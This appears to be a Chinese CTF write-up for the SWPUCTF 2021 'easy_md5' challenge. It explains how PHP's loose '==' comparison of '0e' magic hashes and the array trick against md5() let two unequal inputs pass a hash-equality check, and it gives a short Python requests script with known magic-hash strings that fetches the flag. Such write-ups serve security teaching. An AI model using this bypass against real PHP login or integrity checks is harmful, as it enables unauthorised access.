[SWPUCTF 2021 新生赛]easy_md5

题目:

从题目可看出:

该题判断用户是否通过get方法传递了name参数和使用post方法传递了password参数

如果没有,直接输出wrong

  • 如果有,它就将这两个参数分别赋值给name和password变量,并进行以下判断:
    • 如果name和password不相等,并且它们的MD5哈希值相等,就输出flag2.php文件中的内容。
      • 这是一个逻辑漏洞,因为MD5哈希函数是不可逆的,但是存在碰撞的可能性,也就是说,不同的输入可能产生相同的输出。所以,如果用户能够找到两个不同的字符串,但是它们的MD5值相同,就可以通过这个判断。
      • 否则,就输出wrong!。

考察知识:

两变量值不相等,MD5计算散列值后相等绕过的方法

1.==的绕过

PHP中==是判断值是否相等,若两个变量的类型不相等,则会转化为相同类型后再进行比较。PHP在处理哈希字符串的时候,它把每一个以0e开头并且后面字符均为纯数字的哈希值都解析为0

python 复制代码
import requests

# 网站的URL
url = "http://node5.anna.nssctf.cn:28993/"

# 用get方法传递的password参数
name = "s878926199a"
# 用post方法传递的password参数
password = "s155964671a"
# 两个参数的md5值均以0e开头且后面的字符均为纯数字
# 发送post和get请求,并获取响应对象
response = requests.post(url, data={"password": password}, params={"name": name})

#response = requests.get(url, params={"name": name})
# 打印响应的文本内容
print(response.text)

2.===的绕过

===会比较类型,这个时候可以用到PHP中md5()函数无法处理数组(会返回NULL)来实现绕过

相关推荐
white-persist2 分钟前
Python实例方法与Python类的构造方法全解析
开发语言·前端·python·原型模式
Java 码农27 分钟前
Centos7 maven 安装
java·python·centos·maven
倔强青铜三1 小时前
苦练Python第63天:零基础玩转TOML配置读写,tomllib模块实战
人工智能·python·面试
浔川python社2 小时前
《网络爬虫技术规范与应用指南系列》(xc—3):合规实操与场景落地
python
B站计算机毕业设计之家2 小时前
智慧交通项目:Python+YOLOv8 实时交通标志系统 深度学习实战(TT100K+PySide6 源码+文档)✅
人工智能·python·深度学习·yolo·计算机视觉·智慧交通·交通标志
IT森林里的程序猿2 小时前
基于机器学习方法的网球比赛胜负趋势预测
python·机器学习·django
正牌强哥2 小时前
Futures_ML——机器学习在期货量化交易中的应用与实践
人工智能·python·机器学习·ai·交易·akshare
倔强青铜三2 小时前
苦练Python第62天:零基础玩转CSV文件读写,csv模块实战
人工智能·python·面试
郝学胜-神的一滴2 小时前
Effective Python 第43条:自定义容器类型为什么应该从 `collections.abc` 继承?
开发语言·python
银行数字化转型导师坚鹏3 小时前
如何设计优秀的企业微信私域运营实战培训方案
大数据·python·企业微信